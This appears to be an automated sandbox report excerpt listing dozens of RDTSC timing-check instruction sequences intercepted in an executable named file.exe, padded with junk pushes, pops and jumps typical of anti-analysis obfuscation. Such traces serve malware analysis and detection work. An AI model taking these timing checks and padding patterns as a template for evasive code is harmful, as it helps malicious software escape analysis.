Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753F4D second address: 753F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBEh 0x00000007 jo 00007F8C5451FBB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540B3 second address: 7540B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540B9 second address: 7540BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540BD second address: 7540F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522438h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8C5452242Fh 0x00000011 js 00007F8C54522426h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75A41F second address: 75A431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75A431 second address: 75A449 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C54522426h 0x00000008 jnc 00007F8C54522426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F8C54522426h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75A449 second address: 75A44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75A44D second address: 75A476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F8C5452244Dh 0x0000000e push ecx 0x0000000f jmp 00007F8C54522433h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75A476 second address: 75A47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B5C14 second address: 6B5C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 758FF4 second address: 759002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C5451FBB6h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759430 second address: 75943A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C54522426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705547 second address: 705559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75959F second address: 7595B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8C54522426h 0x0000000a jmp 00007F8C5452242Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7595B6 second address: 7595DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C5451FBBFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76260B second address: 762610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 762E74 second address: 762E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7631C4 second address: 7631DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522432h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7631DA second address: 7631E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7631E0 second address: 7631E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76376E second address: 76379F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C5451FBC0h 0x0000000b popad 0x0000000c pushad 0x0000000d ja 00007F8C5451FBB6h 0x00000013 ja 00007F8C5451FBB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d push esi 0x0000001e jg 00007F8C5451FBBCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7679EE second address: 767A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F8C5452242Ch 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766E5B second address: 766E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766E5F second address: 766E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8C5452242Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766FEC second address: 766FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F8C5451FBB6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766FF8 second address: 766FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774563 second address: 774574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007F8C5451FBB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774574 second address: 77457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77457E second address: 7745A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F8C5451FBBCh 0x00000014 js 00007F8C5451FBB6h 0x0000001a push eax 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7745A2 second address: 7745AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77471B second address: 774721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774721 second address: 77472B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77472B second address: 77472F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77472F second address: 77476D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522432h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8C5452242Dh 0x00000010 pushad 0x00000011 jl 00007F8C54522426h 0x00000017 jmp 00007F8C5452242Eh 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774A5E second address: 774A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C5451FBBBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C5451FBC1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774A85 second address: 774A94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F8C54522426h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774A94 second address: 774A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8C5451FBB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774D62 second address: 774D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5452242Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 775485 second address: 775489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 775489 second address: 77548F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 775B6A second address: 775B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C5451FBBDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 774141 second address: 77415B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522436h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D255 second address: 77D260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F8C5451FBB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D260 second address: 77D26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCA1 second address: 77CCA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCA7 second address: 77CCAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCAE second address: 77CCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCB4 second address: 77CCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CCBC second address: 77CCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CF0C second address: 77CF16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BACC2 second address: 6BACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8C5451FBC4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788727 second address: 78875B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F8C54522438h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C5452242Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78875B second address: 788761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78894A second address: 788976 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F8C54522426h 0x00000009 pop edi 0x0000000a jmp 00007F8C54522436h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F8C5452242Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 788976 second address: 78897A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794313 second address: 794317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794317 second address: 79432D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C5451FBC0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D928 second address: 79D92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D92C second address: 79D930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D726 second address: 79D730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C54522426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D730 second address: 79D736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A19E8 second address: 7A19EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A19EC second address: 7A19F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A19F4 second address: 7A19FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A19FA second address: 7A1A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A1A00 second address: 7A1A0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AB24D second address: 7AB286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F8C5451FBC1h 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F8C5451FBBCh 0x00000015 js 00007F8C5451FBC2h 0x0000001b jno 00007F8C5451FBB6h 0x00000021 jc 00007F8C5451FBB6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AB286 second address: 7AB28B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AB28B second address: 7AB2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C5451FBC4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A9E1C second address: 7A9E32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C5452242Ch 0x00000008 ja 00007F8C5452242Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AA0F0 second address: 7AA0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AAF99 second address: 7AAF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AAF9F second address: 7AAFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AAFA5 second address: 7AAFC5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C54522426h 0x00000008 jmp 00007F8C54522430h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AAFC5 second address: 7AAFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AAFC9 second address: 7AAFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF0F8 second address: 7AF0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2F5D second address: 7B2F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C54522426h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2F68 second address: 7B2F85 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F8C5451FBBFh 0x0000000a pop edx 0x0000000b jo 00007F8C5451FBBCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BF970 second address: 7BF974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0F10 second address: 7C0F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0F1D second address: 7C0F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0F23 second address: 7C0F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C3752 second address: 7C3756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C3756 second address: 7C3774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8C5451FBC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C3774 second address: 7C3779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1BBA second address: 7D1BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C5451FBC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1BDC second address: 7D1BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1BE2 second address: 7D1C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007F8C5451FBC3h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F8C5451FBC5h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F8C5451FBBEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D1C29 second address: 7D1C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D596C second address: 7D5984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5984 second address: 7D598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D598A second address: 7D59AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F8C5451FBC6h 0x0000000e jmp 00007F8C5451FBC0h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D547B second address: 7D547F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D547F second address: 7D5483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDF41 second address: 7EDF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EDF47 second address: 7EDF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE22E second address: 7EE234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EE234 second address: 7EE24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C5451FBBCh 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F8C5451FBB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F12B4 second address: 7F12B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4038 second address: 7F4099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movzx edx, dx 0x0000000a push dword ptr [ebp+122D1E76h] 0x00000010 mov edx, 6E6B1BFBh 0x00000015 call 00007F8C5451FBB9h 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 js 00007F8C5451FBC4h 0x00000027 jmp 00007F8C5451FBBEh 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8C5451FBC6h 0x00000034 pop edx 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jp 00007F8C5451FBB6h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4099 second address: 7F40AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
